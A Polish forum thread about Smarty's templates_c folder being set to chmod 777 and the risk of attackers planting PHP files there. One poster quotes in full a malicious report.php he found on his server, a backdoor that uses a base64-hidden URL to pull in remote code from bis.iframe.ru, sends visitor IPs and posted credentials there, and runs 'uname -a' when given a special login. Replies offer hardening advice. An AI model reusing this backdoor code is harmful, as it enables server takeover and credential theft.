Bezpieczeństwo Smarty

[madel]

Mam następujący problem: wykorzystanie Smarty'ego ciągnie za sobą potrzebę ustawienia chmod 777 dla templates_c, w dokumentacji pisza o 775 ale to niestety po prostu nie działa dla 775 ani 776 (może kwestia konf serwera, nie wiem). W każdym razie czy możliwe jest wrzucenie zdalne pliku .php do templates_c i wykonanie go w celu kradzieży zawartości serwera?

A tak wogólę to proponuję osobny dział pod tytułem bezpieczeństwo na tym forum.

Dzięki z góry za sensowne dopiski do tematu.

[Mion]

W każdym razie czy możliwe jest wrzucenie zdalne pliku .php do templates_c i wykonanie go w celu kradzieży zawartości serwera?

NIE

[mkr]

Jak się boisz wrzuć tam htaccess zabraniajacy dostepu do tego katalogu. ( deny from all)

[nrm]

nie mówiąc o tym aby zamienić standardowe nazwy katalogów na jakieś bzdziągwy !!!

[madel]

Poruszylem ten temat ponieważ znalazłem u siebie podejrzany plik report.php w folderze 777, plik ma nastepująca strukturę i jak sie okazało po przeszukaniu netu jest to dość popularny robak, dociąga biblioteki z adresu bis.iframe.ru/master.php?r_addr= :

<?php

error_reporting(0);

if(isset($_POST["l"]) and isset($_POST["p"])){

if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}

else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}

}else{$user_auth="";}

if(!isset($_POST["log_flg"])){$log_flg="&log";}

if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))

{

if($_POST["l"]=="special"){print "sys_active". `uname -a`;}

}

?>

Więcej na ten temat:

https://www.google.pl/search?hs=f4c&hl=...=Szukaj&lr=

Plik jest samokopiujący i atakuje cały serwer (wszedł nie przez mojego CMS'a jak poczatkowo sądziłem - sprawdzam mime więc nie da rady) ale kędy innędy i ponoć kopiuje sie do wszystkich 777 na serwerze i usuwanie nic nie daje, oczywiście zgłosiłem adminowi serwera, ale konkluzja na jednym z forów dyskusyjnych po burzliwej dyskusji brzmi:

This is a server expoit you are not safe until you ahve moved to anew server.

Innymi słowy - zmień host.

Deny all ponoć blokuje move_uploaded_files więc nie wszędzie da się stosować.

Ponoć plik głównie miesza z płatnościami kartą których na szczęście u siebie nie mam zaimplementowanych.

W kazdym razie uczulam na problem, jeżeli macie 777 sprawdzcie czy nie ma tam pliku report.php

[nrm]

miałem ten ruski syf na koncie jednego z userow trochę syfu mi nawrzucał :/

[Hellz]

The Smarty directories are only accessed by the Smarty library and never accessed directly by the web browser. Therefore to avoid any security concerns, it is recommended to place these directories outside of the document root.

Wystarczy stosować się do manuala.

[shpyo]

ehh, czy tak ciężko zmienić nazwę katalogu z tpl? najepiej wyrzucić po za public_html/

[madel]

No przecież tłumaczę, że to jest robak, który łazi po całym serwerze i wszedł nie przez mój serwis tylko przez jakiegoś dziurawego cms'a i teraz sie kopiuje po wszystkich folderach 777 w obrębie całego serwera więc lokalizacja katalogu nic nie zmienia.

[Hellz]

W takim razie, dlaczego jako koder zajmujesz się serwerem? Folder tymczasowy tmp powinien być postawiony jako osobna partycja z atrybutem noexec i nosuid. Ogólnie, jak to zabezpieczyć masz napisane https://www.webhostgear.com/34.html . Inaczej żadne sztuczki php Ci nie pomogą.